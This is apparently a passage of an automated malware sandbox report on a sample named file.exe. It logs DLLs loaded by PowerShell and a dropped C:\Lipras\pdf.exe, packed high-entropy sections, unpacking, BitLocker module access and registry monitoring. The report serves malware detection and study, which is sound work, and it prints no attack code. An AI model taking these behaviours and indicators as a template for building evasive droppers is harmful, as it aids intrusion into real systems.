Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Lipras\pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdb source: file.exe
Source:	Binary string: C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdbnh source: file.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Lipras\pdf.exe

Unpacked PE file: 7.2.pdf.exe.30000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;

Source: file.exe

Static PE information: 0xA794DF11 [Tue Feb 4 02:31:45 2059 UTC]

Source: pdf.exe.0.dr	Static PE information: section name:
Source: pdf.exe.0.dr	Static PE information: section name:
Source: pdf.exe.0.dr	Static PE information: section name:
Source: pdf.exe.0.dr	Static PE information: section name:
Source: pdf.exe.0.dr	Static PE information: section name:

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04C66105 push eax; ret	2_2_04C66119
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08C67D78 pushfd ; iretd	2_2_08C67D79
Source: C:\Lipras\pdf.exe	Code function: 7_2_000314CE push dword ptr [edx+eax-77h]; ret	7_2_000314D3
Source: C:\Lipras\pdf.exe	Code function: 7_2_0004FEEB push ebx; ret	7_2_0004FEF6
Source: C:\Lipras\pdf.exe	Code function: 7_2_0004FF0F push ebx; ret	7_2_0004FF13
Source: C:\Lipras\pdf.exe	Code function: 7_2_026338DA push ecx; retf	7_2_026338DB

Source: pdf.exe.0.dr	Static PE information: section name: entropy: 7.997714729230857
Source: pdf.exe.0.dr	Static PE information: section name: entropy: 7.636228005076095
Source: pdf.exe.0.dr	Static PE information: section name: entropy: 7.9278998086211505
Source: pdf.exe.0.dr	Static PE information: section name: entropy: 7.978359432501147
Source: pdf.exe.0.dr	Static PE information: section name: .data entropy: 7.985452413999655

Source: C:\Users\user\Desktop\file.exe

File created: C:\Lipras\pdf.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
